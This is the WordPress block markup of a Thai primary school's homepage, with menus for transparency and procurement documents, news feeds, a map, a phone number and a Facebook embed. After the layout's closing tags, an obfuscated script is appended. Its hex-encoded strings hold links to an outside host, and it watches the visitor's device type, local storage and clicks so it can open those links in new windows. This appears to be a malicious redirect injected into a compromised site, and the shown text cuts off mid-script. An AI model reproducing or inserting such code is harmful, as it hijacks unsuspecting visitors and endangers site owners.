href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 